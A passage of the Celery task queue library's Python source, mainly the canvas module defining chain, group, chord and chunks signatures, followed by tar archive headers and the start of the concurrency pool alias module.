__deepcopy__(self, memo): memo[id(self)] = self return dict(self) def __invert__(self): return self.apply_async().get() def __reduce__(self): # for serialization, the task type is lazily loaded, # and not stored in the dict itself. 
return signature, (dict(self),) def __json__(self): return dict(self) def __repr__(self): return self.reprcall() def items(self): for k, v in super().items(): yield k.decode() if isinstance(k, bytes) else k, v @property def name(self): # for duck typing compatibility with Task.name return self.task @cached_property def type(self): return self._type or self.app.tasks[self['task']] @cached_property def app(self): return self._app or current_app @cached_property def AsyncResult(self): try: return self.type.AsyncResult except KeyError: # task not registered return self.app.AsyncResult @cached_property def _apply_async(self): try: return self.type.apply_async except KeyError: return _partial(self.app.send_task, self['task']) id = getitem_property('options.task_id', 'Task UUID') parent_id = getitem_property('options.parent_id', 'Task parent UUID.') root_id = getitem_property('options.root_id', 'Task root UUID.') task = getitem_property('task', 'Name of task.') args = getitem_property('args', 'Positional arguments to task.') kwargs = getitem_property('kwargs', 'Keyword arguments to task.') options = getitem_property('options', 'Task execution options.') subtask_type = getitem_property('subtask_type', 'Type of signature') immutable = getitem_property( 'immutable', 'Flag set if no longer accepts new arguments') def _prepare_chain_from_options(options, tasks, use_link): # When we publish groups we reuse the same options dictionary for all of # the tasks in the group. See: # https://github.com/celery/celery/blob/fb37cb0b8/celery/canvas.py#L1022. # Issue #5354 reported that the following type of canvases # causes a Celery worker to hang: # group( # add.s(1, 1), # add.s(1, 1) # ) | tsum.s() | add.s(1) | group(add.s(1), add.s(1)) # The resolution of #5354 in PR #5681 was to only set the `chain` key # in the options dictionary if it is not present. # Otherwise we extend the existing list of tasks in the chain with the new # tasks: options['chain'].extend(chain_). # Before PR #5681 we overrode the `chain` key in each iteration # of the loop which applies all the tasks in the group: # options['chain'] = tasks if not use_link else None # This caused Celery to execute chains correctly in most cases since # in each iteration the `chain` key would reset itself to a new value # and the side effect of mutating the key did not propagate # to the next task in the group. # Since we now mutated the `chain` key, a *list* which is passed # by *reference*, the next task in the group will extend the list # of tasks in the chain instead of setting a new one from the chain_ # variable above. # This causes Celery to execute a chain, even though there might not be # one to begin with. Alternatively, it causes Celery to execute more tasks # that were previously present in the previous task in the group. # The solution is to be careful and never mutate the options dictionary # to begin with. # Here is an example of a canvas which triggers this issue: # add.s(5, 6) | group((add.s(1) | add.s(2), add.s(3))). # The expected result is [14, 14]. However, when we extend the `chain` # key the `add.s(3)` task erroneously has `add.s(2)` in its chain since # it was previously applied to `add.s(1)`. # Without being careful not to mutate the options dictionary, the result # in this case is [16, 14]. # To avoid deep-copying the entire options dictionary every single time we # run a chain we use a ChainMap and ensure that we never mutate # the original `chain` key, hence we use list_a + list_b to create a new # list. 
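    # Illustrative sketch (t_b and t_c are hypothetical signatures that share
    # one options dict):
    #     options = {'chain': [t_b]}
    #     ChainMap({'chain': options['chain'] + [t_c]}, options)['chain']
    #     # -> [t_b, t_c], while options['chain'] is still [t_b]
    # whereas options['chain'].extend([t_c]) would leak t_c into every other
    # signature sharing this options dictionary.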
if use_link: return ChainMap({'chain': None}, options) elif 'chain' not in options: return ChainMap({'chain': tasks}, options) elif tasks is not None: # chain option may already be set, resulting in # "multiple values for keyword argument 'chain'" error. # Issue #3379. # If a chain already exists, we need to extend it with the next # tasks in the chain. # Issue #5354. # WARNING: Be careful not to mutate `options['chain']`. return ChainMap({'chain': options['chain'] + tasks}, options) @Signature.register_type(name='chain') class _chain(Signature): tasks = getitem_property('kwargs.tasks', 'Tasks in chain.') @classmethod def from_dict(cls, d, app=None): tasks = d['kwargs']['tasks'] if tasks: if isinstance(tasks, tuple): # aaaargh tasks = d['kwargs']['tasks'] = list(tasks) tasks = [maybe_signature(task, app=app) for task in tasks] return _chain(tasks, app=app, **d['options']) def __init__(self, *tasks, **options): tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0]) else tasks) super().__init__('celery.chain', (), {'tasks': tasks}, **options ) self._use_link = options.pop('use_link', None) self.subtask_type = 'chain' self._frozen = None def __call__(self, *args, **kwargs): if self.tasks: return self.apply_async(args, kwargs) def __or__(self, other): if isinstance(other, group): # unroll group with one member other = maybe_unroll_group(other) # chain | group() -> chain tasks = self.unchain_tasks() if not tasks: # If the chain is empty, return the group return other return _chain(seq_concat_item( tasks, other), app=self._app) elif isinstance(other, _chain): # chain | chain -> chain return _chain(seq_concat_seq( self.unchain_tasks(), other.unchain_tasks()), app=self._app) elif isinstance(other, Signature): if self.tasks and isinstance(self.tasks[-1], group): # CHAIN [last item is group] | TASK -> chord sig = self.clone() sig.tasks[-1] = chord( sig.tasks[-1], other, app=self._app) return sig elif self.tasks and isinstance(self.tasks[-1], chord): # CHAIN [last item is chord] -> chain with chord body. sig = self.clone() sig.tasks[-1].body = sig.tasks[-1].body | other return sig else: # chain | task -> chain return _chain(seq_concat_item( self.unchain_tasks(), other), app=self._app) else: return NotImplemented def clone(self, *args, **kwargs): to_signature = maybe_signature signature = super().clone(*args, **kwargs) signature.kwargs['tasks'] = [ to_signature(sig, app=self._app, clone=True) for sig in signature.kwargs['tasks'] ] return signature def unchain_tasks(self): # Clone chain's tasks assigning signatures from link_error # to each task tasks = [t.clone() for t in self.tasks] for sig in self.options.get('link_error', []): for task in tasks: task.link_error(sig) return tasks def apply_async(self, args=None, kwargs=None, **options): # python is best at unpacking kwargs, so .run is here to do that. args = args if args else () kwargs = kwargs if kwargs else [] app = self.app if app.conf.task_always_eager: with allow_join_result(): return self.apply(args, kwargs, **options) return self.run(args, kwargs, app=app, **( dict(self.options, **options) if options else self.options)) def run(self, args=None, kwargs=None, group_id=None, chord=None, task_id=None, link=None, link_error=None, publisher=None, producer=None, root_id=None, parent_id=None, app=None, group_index=None, **options): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. 
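        # Overview: prepare_steps() below clones and freezes every member of
        # the chain; only the first task is published from here.  With task
        # protocol 2 the remaining tasks travel in the message's ``chain``
        # option (in reverse, so the worker can pop() the next step), while
        # with ``use_link`` they are linked as callbacks instead.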
args = args if args else () kwargs = kwargs if kwargs else [] app = app or self.app use_link = self._use_link if use_link is None and app.conf.task_protocol == 1: use_link = True args = (tuple(args) + tuple(self.args) if args and not self.immutable else self.args) tasks, results_from_prepare = self.prepare_steps( args, kwargs, self.tasks, root_id, parent_id, link_error, app, task_id, group_id, chord, group_index=group_index, ) if results_from_prepare: if link: tasks[0].extend_list_option('link', link) first_task = tasks.pop() options = _prepare_chain_from_options(options, tasks, use_link) result_from_apply = first_task.apply_async(**options) # If we only have a single task, it may be important that we pass # the real result object rather than the one obtained via freezing. # e.g. For `GroupResult`s, we need to pass back the result object # which will actually have its promise fulfilled by the subtasks, # something that will never occur for the frozen result. if not tasks: return result_from_apply else: return results_from_prepare[0] # in order for a chain to be frozen, each of the members of the chain individually needs to be frozen # TODO figure out why we are always cloning before freeze def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. _, results = self._frozen = self.prepare_steps( self.args, self.kwargs, self.tasks, root_id, parent_id, None, self.app, _id, group_id, chord, clone=False, group_index=group_index, ) return results[0] def prepare_steps(self, args, kwargs, tasks, root_id=None, parent_id=None, link_error=None, app=None, last_task_id=None, group_id=None, chord_body=None, clone=True, from_dict=Signature.from_dict, group_index=None): app = app or self.app # use chain message field for protocol 2 and later. # this avoids pickle blowing the stack on the recursion # required by linking task together in a tree structure. # (why is pickle using recursion? or better yet why cannot python # do tail call optimization making recursion actually useful?) use_link = self._use_link if use_link is None and app.conf.task_protocol == 1: use_link = True steps = deque(tasks) # optimization: now the pop func is a local variable steps_pop = steps.pop steps_extend = steps.extend prev_task = None prev_res = None tasks, results = [], [] i = 0 # NOTE: We are doing this in reverse order. # The result is a list of tasks in reverse order, that is # passed as the ``chain`` message field. # As it's reversed the worker can just do ``chain.pop()`` to # get the next task in the chain. while steps: task = steps_pop() # if steps is not empty, this is the first task - reverse order # if i = 0, this is the last task - again, because we're reversed is_first_task, is_last_task = not steps, not i if not isinstance(task, abstract.CallableSignature): task = from_dict(task, app=app) if isinstance(task, group): # when groups are nested, they are unrolled - all tasks within # groups within groups should be called in parallel task = maybe_unroll_group(task) # first task gets partial args from chain if clone: if is_first_task: task = task.clone(args, kwargs) else: task = task.clone() elif is_first_task: task.args = tuple(args) + tuple(task.args) if isinstance(task, _chain): # splice (unroll) the chain steps_extend(task.tasks) continue # TODO why isn't this asserting is_last_task == False? if isinstance(task, group) and prev_task: # automatically upgrade group(...) 
| s to chord(group, s) # for chords we freeze by pretending it's a normal # signature instead of a group. tasks.pop() results.pop() try: task = chord( task, body=prev_task, task_id=prev_res.task_id, root_id=root_id, app=app, ) except AttributeError: # A GroupResult does not have a task_id since it consists # of multiple tasks. # We therefore, have to construct the chord without it. # Issues #5467, #3585. task = chord( task, body=prev_task, root_id=root_id, app=app, ) if is_last_task: # chain(task_id=id) means task id is set for the last task # in the chain. If the chord is part of a chord/group # then that chord/group must synchronize based on the # last task in the chain, so we only set the group_id and # chord callback for the last task. res = task.freeze( last_task_id, root_id=root_id, group_id=group_id, chord=chord_body, group_index=group_index, ) else: res = task.freeze(root_id=root_id) i += 1 if prev_task: if use_link: # link previous task to this task. task.link(prev_task) if prev_res and not prev_res.parent: prev_res.parent = res if link_error: for errback in maybe_list(link_error): task.link_error(errback) tasks.append(task) results.append(res) prev_task, prev_res = task, res if isinstance(task, chord): app.backend.ensure_chords_allowed() # If the task is a chord, and the body is a chain # the chain has already been prepared, and res is # set to the last task in the callback chain. # We need to change that so that it points to the # group result object. node = res while node.parent: node = node.parent prev_res = node return tasks, results def apply(self, args=None, kwargs=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} last, (fargs, fkwargs) = None, (args, kwargs) for task in self.tasks: res = task.clone(fargs, fkwargs).apply( last and (last.get(),), **dict(self.options, **options)) res.parent, last, (fargs, fkwargs) = last, res, (None, None) return last @property def app(self): app = self._app if app is None: try: app = self.tasks[0]._app except LookupError: pass return app or current_app def __repr__(self): if not self.tasks: return f'<{type(self).__name__}@{id(self):#x}: empty>' return remove_repeating_from_task( self.tasks[0]['task'], ' | '.join(repr(t) for t in self.tasks)) class chain(_chain): """Chain tasks together. Each tasks follows one another, by being applied as a callback of the previous task. Note: If called with only one argument, then that argument must be an iterable of tasks to chain: this allows us to use generator expressions. Example: This is effectively :math:`((2 + 2) + 4)`: .. code-block:: pycon >>> res = chain(add.s(2, 2), add.s(4))() >>> res.get() 8 Calling a chain will return the result of the last task in the chain. You can get to the other tasks by following the ``result.parent``'s: .. code-block:: pycon >>> res.parent.get() 4 Using a generator expression: .. code-block:: pycon >>> lazy_chain = chain(add.s(i) for i in range(10)) >>> res = lazy_chain(3) Arguments: *tasks (Signature): List of task signatures to chain. If only one argument is passed and that argument is an iterable, then that'll be used as the list of signatures to chain instead. This means that you can use a generator expression. Returns: ~celery.chain: A lazy signature that can be called to apply the first task in the chain. When that task succeeds the next task in the chain is applied, and so on. """ # could be function, but must be able to reference as :class:`chain`. 
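    # Note: ``__new__`` below folds the given tasks with ``operator.or_``, so
    # (with a stand-in ``add`` task) chain(add.s(2, 2), add.s(4), add.s(8))
    # builds the same signature as add.s(2, 2) | add.s(4) | add.s(8).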
def __new__(cls, *tasks, **kwargs): # This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z` if not kwargs and tasks: if len(tasks) != 1 or is_list(tasks[0]): tasks = tasks[0] if len(tasks) == 1 else tasks # if is_list(tasks) and len(tasks) == 1: # return super(chain, cls).__new__(cls, tasks, **kwargs) return reduce(operator.or_, tasks, chain()) return super().__new__(cls, *tasks, **kwargs) class _basemap(Signature): _task_name = None _unpack_args = itemgetter('task', 'it') @classmethod def from_dict(cls, d, app=None): return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']) def __init__(self, task, it, **options): super().__init__(self._task_name, (), {'task': task, 'it': regen(it)}, immutable=True, **options ) def apply_async(self, args=None, kwargs=None, **opts): # need to evaluate generators args = args if args else () kwargs = kwargs if kwargs else {} task, it = self._unpack_args(self.kwargs) return self.type.apply_async( (), {'task': task, 'it': list(it)}, route_name=task_name_from(self.kwargs.get('task')), **opts ) @Signature.register_type() class xmap(_basemap): """Map operation for tasks. Note: Tasks executed sequentially in process, this is not a parallel operation like :class:`group`. """ _task_name = 'celery.map' def __repr__(self): task, it = self._unpack_args(self.kwargs) return f'[{task.task}(x) for x in {truncate(repr(it), 100)}]' @Signature.register_type() class xstarmap(_basemap): """Map operation for tasks, using star arguments.""" _task_name = 'celery.starmap' def __repr__(self): task, it = self._unpack_args(self.kwargs) return f'[{task.task}(*x) for x in {truncate(repr(it), 100)}]' @Signature.register_type() class chunks(Signature): """Partition of tasks into chunks of size n.""" _unpack_args = itemgetter('task', 'it', 'n') @classmethod def from_dict(cls, d, app=None): return chunks(*cls._unpack_args(d['kwargs']), app=app, **d['options']) def __init__(self, task, it, n, **options): super().__init__('celery.chunks', (), {'task': task, 'it': regen(it), 'n': n}, immutable=True, **options ) def __call__(self, **options): return self.apply_async(**options) def apply_async(self, args=None, kwargs=None, **opts): args = args if args else () kwargs = kwargs if kwargs else {} return self.group().apply_async( args, kwargs, route_name=task_name_from(self.kwargs.get('task')), **opts ) def group(self): # need to evaluate generators task, it, n = self._unpack_args(self.kwargs) return group((xstarmap(task, part, app=self._app) for part in _chunks(iter(it), n)), app=self._app) @classmethod def apply_chunks(cls, task, it, n, app=None): return cls(task, it, n, app=app)() def _maybe_group(tasks, app): if isinstance(tasks, dict): tasks = signature(tasks, app=app) if isinstance(tasks, (group, _chain)): tasks = tasks.tasks elif isinstance(tasks, abstract.CallableSignature): tasks = [tasks] else: if isinstance(tasks, GeneratorType): tasks = regen(signature(t, app=app) for t in tasks) else: tasks = [signature(t, app=app) for t in tasks] return tasks @Signature.register_type() class group(Signature): """Creates a group of tasks to be executed in parallel. A group is lazy so you must call it to take action and evaluate the group. Note: If only one argument is passed, and that argument is an iterable then that'll be used as the list of tasks instead: this allows us to use ``group`` with generator expressions. Example: >>> lazy_group = group([add.s(2, 2), add.s(4, 4)]) >>> promise = lazy_group() # <-- evaluate: returns lazy result. 
>>> promise.get() # <-- will wait for the task to return [4, 8] Arguments: *tasks (List[Signature]): A list of signatures that this group will call. If there's only one argument, and that argument is an iterable, then that'll define the list of signatures instead. **options (Any): Execution options applied to all tasks in the group. Returns: ~celery.group: signature that when called will then call all of the tasks in the group (and return a :class:`GroupResult` instance that can be used to inspect the state of the group). """ tasks = getitem_property('kwargs.tasks', 'Tasks in group.') @classmethod def from_dict(cls, d, app=None): # We need to mutate the `kwargs` element in place to avoid confusing # `freeze()` implementations which end up here and expect to be able to # access elements from that dictionary later and refer to objects # canonicalized here orig_tasks = d["kwargs"]["tasks"] d["kwargs"]["tasks"] = rebuilt_tasks = type(orig_tasks)( maybe_signature(task, app=app) for task in orig_tasks ) return group(rebuilt_tasks, app=app, **d['options']) def __init__(self, *tasks, **options): if len(tasks) == 1: tasks = tasks[0] if isinstance(tasks, group): tasks = tasks.tasks if isinstance(tasks, abstract.CallableSignature): tasks = [tasks.clone()] if not isinstance(tasks, _regen): tasks = regen(tasks) super().__init__('celery.group', (), {'tasks': tasks}, **options ) self.subtask_type = 'group' def __call__(self, *partial_args, **options): return self.apply_async(partial_args, **options) def __or__(self, other): # group() | task -> chord return chord(self, body=other, app=self._app) def skew(self, start=1.0, stop=None, step=1.0): it = fxrange(start, stop, step, repeatlast=True) for task in self.tasks: task.set(countdown=next(it)) return self def apply_async(self, args=None, kwargs=None, add_to_parent=True, producer=None, link=None, link_error=None, **options): args = args if args else () if link is not None: raise TypeError('Cannot add link to group: use a chord') if link_error is not None: raise TypeError( 'Cannot add link to group: do that on individual tasks') app = self.app if app.conf.task_always_eager: return self.apply(args, kwargs, **options) if not self.tasks: return self.freeze() options, group_id, root_id = self._freeze_gid(options) tasks = self._prepared(self.tasks, [], group_id, root_id, app) p = barrier() results = list(self._apply_tasks(tasks, producer, app, p, args=args, kwargs=kwargs, **options)) result = self.app.GroupResult(group_id, results, ready_barrier=p) p.finalize() # - Special case of group(A.s() | group(B.s(), C.s())) # That is, group with single item that's a chain but the # last task in that chain is a group. # # We cannot actually support arbitrary GroupResults in chains, # but this special case we can. if len(result) == 1 and isinstance(result[0], GroupResult): result = result[0] parent_task = app.current_worker_task if add_to_parent and parent_task: parent_task.add_trail(result) return result def apply(self, args=None, kwargs=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} app = self.app if not self.tasks: return self.freeze() # empty group returns GroupResult options, group_id, root_id = self._freeze_gid(options) tasks = self._prepared(self.tasks, [], group_id, root_id, app) return app.GroupResult(group_id, [ sig.apply(args=args, kwargs=kwargs, **options) for sig, _, _ in tasks ]) def set_immutable(self, immutable): for task in self.tasks: task.set_immutable(immutable) def link(self, sig): # Simply link to first task. 
Doing this is slightly misleading because # the callback may be executed before all children in the group are # completed and also if any children other than the first one fail. # # The callback signature is cloned and made immutable since it the # first task isn't actually capable of passing the return values of its # siblings to the callback task. sig = sig.clone().set(immutable=True) return self.tasks[0].link(sig) def link_error(self, sig): # Any child task might error so we need to ensure that they are all # capable of calling the linked error signature. This opens the # possibility that the task is called more than once but that's better # than it not being called at all. # # We return a concretised tuple of the signatures actually applied to # each child task signature, of which there might be none! return tuple(child_task.link_error(sig) for child_task in self.tasks) def _prepared(self, tasks, partial_args, group_id, root_id, app, CallableSignature=abstract.CallableSignature, from_dict=Signature.from_dict, isinstance=isinstance, tuple=tuple): for task in tasks: if isinstance(task, CallableSignature): # local sigs are always of type Signature, and we # clone them to make sure we don't modify the originals. task = task.clone() else: # serialized sigs must be converted to Signature. task = from_dict(task, app=app) if isinstance(task, group): # needs yield_from :( unroll = task._prepared( task.tasks, partial_args, group_id, root_id, app, ) yield from unroll else: if partial_args and not task.immutable: task.args = tuple(partial_args) + tuple(task.args) yield task, task.freeze(group_id=group_id, root_id=root_id), group_id def _apply_tasks(self, tasks, producer=None, app=None, p=None, add_to_parent=None, chord=None, args=None, kwargs=None, **options): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. app = app or self.app with app.producer_or_acquire(producer) as producer: # Iterate through tasks two at a time. If tasks is a generator, # we are able to tell when we are at the end by checking if # next_task is None. This enables us to set the chord size # without burning through the entire generator. See #3021. chord_size = 0 for task_index, (current_task, next_task) in enumerate( lookahead(tasks) ): # We expect that each task must be part of the same group which # seems sensible enough. If that's somehow not the case we'll # end up messing up chord counts and there are all sorts of # awful race conditions to think about. We'll hope it's not! sig, res, group_id = current_task chord_obj = chord if chord is not None else sig.options.get("chord") # We need to check the chord size of each contributing task so # that when we get to the final one, we can correctly set the # size in the backend and the chord can be sensible completed. chord_size += _chord._descend(sig) if chord_obj is not None and next_task is None: # Per above, sanity check that we only saw one group app.backend.set_chord_size(group_id, chord_size) sig.apply_async(producer=producer, add_to_parent=False, chord=chord_obj, args=args, kwargs=kwargs, **options) # adding callback to result, such that it will gradually # fulfill the barrier. # # Using barrier.add would use result.then, but we need # to add the weak argument here to only create a weak # reference to the object. if p and not p.cancelled and not p.ready: p.size += 1 res.then(p, weak=True) yield res # <-- r.parent, etc set in the frozen result. 
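    # Note on _apply_tasks() above: lookahead() pairs every task with its
    # successor and yields ``None`` as the successor of the final task, which
    # is how the loop recognises the last contributing signature and only then
    # reports the accumulated chord size to the backend (see #3021).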
def _freeze_gid(self, options): # remove task_id and use that as the group_id, # if we don't remove it then every task will have the same id... options = dict(self.options, **options) options['group_id'] = group_id = ( options.pop('task_id', uuid())) return options, group_id, options.get('root_id') def _freeze_group_tasks(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. opts = self.options try: gid = opts['task_id'] except KeyError: gid = opts['task_id'] = group_id or uuid() if group_id: opts['group_id'] = group_id if chord: opts['chord'] = chord if group_index is not None: opts['group_index'] = group_index root_id = opts.setdefault('root_id', root_id) parent_id = opts.setdefault('parent_id', parent_id) if isinstance(self.tasks, _regen): # We are draining from a generator here. # tasks1, tasks2 are each a clone of self.tasks tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks)) # freeze each task in tasks1, results now holds AsyncResult for each task results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id)) # TODO figure out why this makes sense - # we freeze all tasks in the clone tasks1, and then zip the results # with the IDs of tasks in the second clone, tasks2. and then, we build # a generator that takes only the task IDs from tasks2. self.tasks = regen(x[0] for x in zip(tasks2, results)) else: new_tasks = [] # Need to unroll subgroups early so that chord gets the # right result instance for chord_unlock etc. results = list(self._freeze_unroll( new_tasks, group_id, chord, root_id, parent_id, )) if isinstance(self.tasks, MutableSequence): self.tasks[:] = new_tasks else: self.tasks = new_tasks return gid, results def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): return self.app.GroupResult(*self._freeze_group_tasks( _id=_id, group_id=group_id, chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index )) _freeze = freeze def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id): yield from (task.freeze(group_id=group_id, chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index) for group_index, task in enumerate(tasks)) def _unroll_tasks(self, tasks): # should be refactored to: (maybe_signature(task, app=self._app, clone=True) for task in tasks) yield from (maybe_signature(task, app=self._app).clone() for task in tasks) def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. stack = deque(self.tasks) group_index = 0 while stack: task = maybe_signature(stack.popleft(), app=self._app).clone() # if this is a group, flatten it by adding all of the group's tasks to the stack if isinstance(task, group): stack.extendleft(task.tasks) else: new_tasks.append(task) yield task.freeze(group_id=group_id, chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index) group_index += 1 def __repr__(self): if self.tasks: return remove_repeating_from_task( self.tasks[0]['task'], f'group({self.tasks!r})') return 'group()' def __len__(self): return len(self.tasks) @property def app(self): app = self._app if app is None: try: app = self.tasks[0].app except LookupError: pass return app if app is not None else current_app @Signature.register_type(name="chord") class _chord(Signature): r"""Barrier synchronization primitive. 
A chord consists of a header and a body. The header is a group of tasks that must complete before the callback is called. A chord is essentially a callback for a group of tasks. The body is applied with the return values of all the header tasks as a list. Example: The chord: .. code-block:: pycon >>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s()) is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`: .. code-block:: pycon >>> res.get() 12 """ @classmethod def from_dict(cls, d, app=None): options = d.copy() args, options['kwargs'] = cls._unpack_args(**options['kwargs']) return cls(*args, app=app, **options) @staticmethod def _unpack_args(header=None, body=None, **kwargs): # Python signatures are better at extracting keys from dicts # than manually popping things off. return (header, body), kwargs def __init__(self, header, body=None, task='celery.chord', args=None, kwargs=None, app=None, **options): args = args if args else () kwargs = kwargs if kwargs else {'kwargs': {}} super().__init__(task, args, {**kwargs, 'header': _maybe_group(header, app), 'body': maybe_signature(body, app=app)}, app=app, **options ) self.subtask_type = 'chord' def __call__(self, body=None, **options): return self.apply_async((), {'body': body} if body else {}, **options) def __or__(self, other): if (not isinstance(other, (group, _chain)) and isinstance(other, Signature)): # chord | task -> attach to body sig = self.clone() sig.body = sig.body | other return sig else: return super().__or__(other) def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. if not isinstance(self.tasks, group): self.tasks = group(self.tasks, app=self.app) # first freeze all tasks in the header header_result = self.tasks.freeze( parent_id=parent_id, root_id=root_id, chord=self.body) # secondly freeze all tasks in the body: those that should be called after the header body_result = self.body.freeze( _id, root_id=root_id, chord=chord, group_id=group_id, group_index=group_index) # we need to link the body result back to the group result, # but the body may actually be a chain, # so find the first result without a parent node = body_result seen = set() while node: if node.id in seen: raise RuntimeError('Recursive result parents') seen.add(node.id) if node.parent is None: node.parent = header_result break node = node.parent self.id = self.tasks.id return body_result def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, publisher=None, connection=None, router=None, result_cls=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} args = (tuple(args) + tuple(self.args) if args and not self.immutable else self.args) body = kwargs.pop('body', None) or self.kwargs['body'] kwargs = dict(self.kwargs['kwargs'], **kwargs) body = body.clone(**options) app = self._get_app(body) tasks = (self.tasks.clone() if isinstance(self.tasks, group) else group(self.tasks, app=app)) if app.conf.task_always_eager: with allow_join_result(): return self.apply(args, kwargs, body=body, task_id=task_id, **options) merged_options = dict(self.options, **options) if options else self.options option_task_id = merged_options.pop("task_id", None) if task_id is None: task_id = option_task_id # chord([A, B, ...], C) return self.run(tasks, body, args, task_id=task_id, **merged_options) def apply(self, args=None, kwargs=None, propagate=True, body=None, **options): args = args if args else () kwargs = kwargs 
if kwargs else {} body = self.body if body is None else body tasks = (self.tasks.clone() if isinstance(self.tasks, group) else group(self.tasks, app=self.app)) return body.apply( args=(tasks.apply(args, kwargs).get(propagate=propagate),), ) @classmethod def _descend(cls, sig_obj): # Sometimes serialized signatures might make their way here if not isinstance(sig_obj, Signature) and isinstance(sig_obj, dict): sig_obj = Signature.from_dict(sig_obj) if isinstance(sig_obj, group): # Each task in a group counts toward this chord subtasks = getattr(sig_obj.tasks, "tasks", sig_obj.tasks) return sum(cls._descend(task) for task in subtasks) elif isinstance(sig_obj, _chain): # The last non-empty element in a chain counts toward this chord for child_sig in sig_obj.tasks[-1::-1]: child_size = cls._descend(child_sig) if child_size > 0: return child_size else: # We have to just hope this chain is part of some encapsulating # signature which is valid and can fire the chord body return 0 elif isinstance(sig_obj, chord): # The child chord's body counts toward this chord return cls._descend(sig_obj.body) elif isinstance(sig_obj, Signature): # Each simple signature counts as 1 completion for this chord return 1 # Any other types are assumed to be iterables of simple signatures return len(sig_obj) def __length_hint__(self): tasks = getattr(self.tasks, "tasks", self.tasks) return sum(self._descend(task) for task in tasks) def run(self, header, body, partial_args, app=None, interval=None, countdown=1, max_retries=None, eager=False, task_id=None, **options): app = app or self._get_app(body) group_id = header.options.get('task_id') or uuid() root_id = body.options.get('root_id') options = dict(self.options, **options) if options else self.options if options: options.pop('task_id', None) body.options.update(options) bodyres = body.freeze(task_id, root_id=root_id) # Chains should not be passed to the header tasks. See #3771 options.pop('chain', None) # Neither should chords, for deeply nested chords to work options.pop('chord', None) options.pop('task_id', None) header_result_args = header._freeze_group_tasks(group_id=group_id, chord=body, root_id=root_id) if header.tasks: app.backend.apply_chord( header_result_args, body, interval=interval, countdown=countdown, max_retries=max_retries, ) header_result = header(*partial_args, task_id=group_id, **options) # The execution of a chord body is normally triggered by its header's # tasks completing. If the header is empty this will never happen, so # we execute the body manually here. else: body.delay([]) header_result = self.app.GroupResult(*header_result_args) bodyres.parent = header_result return bodyres def clone(self, *args, **kwargs): signature = super().clone(*args, **kwargs) # need to make copy of body try: signature.kwargs['body'] = maybe_signature( signature.kwargs['body'], clone=True) except (AttributeError, KeyError): pass return signature def link(self, callback): self.body.link(callback) return callback def link_error(self, errback): self.body.link_error(errback) return errback def set_immutable(self, immutable): # changes mutability of header only, not callback. 
for task in self.tasks: task.set_immutable(immutable) def __repr__(self): if self.body: if isinstance(self.body, _chain): return remove_repeating_from_task( self.body.tasks[0]['task'], '%({} | {!r})'.format( self.body.tasks[0].reprcall(self.tasks), chain(self.body.tasks[1:], app=self._app), ), ) return '%' + remove_repeating_from_task( self.body['task'], self.body.reprcall(self.tasks)) return f'' @cached_property def app(self): return self._get_app(self.body) def _get_app(self, body=None): app = self._app if app is None: try: tasks = self.tasks.tasks # is a group except AttributeError: tasks = self.tasks if tasks: app = tasks[0]._app if app is None and body is not None: app = body._app return app if app is not None else current_app tasks = getitem_property('kwargs.header', 'Tasks in chord header.') body = getitem_property('kwargs.body', 'Body task of chord.') # Add a back-compat alias for the previous `chord` class name which conflicts # with keyword arguments elsewhere in this file chord = _chord def signature(varies, *args, **kwargs): """Create new signature. - if the first argument is a signature already then it's cloned. - if the first argument is a dict, then a Signature version is returned. Returns: Signature: The resulting signature. """ app = kwargs.get('app') if isinstance(varies, dict): if isinstance(varies, abstract.CallableSignature): return varies.clone() return Signature.from_dict(varies, app=app) return Signature(varies, *args, **kwargs) subtask = signature # XXX compat def maybe_signature(d, app=None, clone=False): """Ensure obj is a signature, or None. Arguments: d (Optional[Union[abstract.CallableSignature, Mapping]]): Signature or dict-serialized signature. app (celery.Celery): App to bind signature to. clone (bool): If d' is already a signature, the signature will be cloned when this flag is enabled. 
Returns: Optional[abstract.CallableSignature] """ if d is not None: if isinstance(d, abstract.CallableSignature): if clone: d = d.clone() elif isinstance(d, dict): d = signature(d) if app is not None: d._app = app return d maybe_subtask = maybe_signature # XXX compat ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4357502 celery-5.2.3/celery/concurrency/0000775000175000017500000000000000000000000016512 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/__init__.py0000664000175000017500000000174300000000000020630 0ustar00asifasif00000000000000"""Pool implementation abstract factory, and alias definitions.""" # Import from kombu directly as it's used # early in the import stage, where celery.utils loads # too much (e.g., for eventlet patching) from kombu.utils.imports import symbol_by_name __all__ = ('get_implementation', 'get_available_pool_names',) ALIASES = { 'prefork': 'celery.concurrency.prefork:TaskPool', 'eventlet': 'celery.concurrency.eventlet:TaskPool', 'gevent': 'celery.concurrency.gevent:TaskPool', 'solo': 'celery.concurrency.solo:TaskPool', 'processes': 'celery.concurrency.prefork:TaskPool', # XXX compat alias } try: import concurrent.futures # noqa: F401 except ImportError: pass else: ALIASES['threads'] = 'celery.concurrency.thread:TaskPool' def get_implementation(cls): """Return 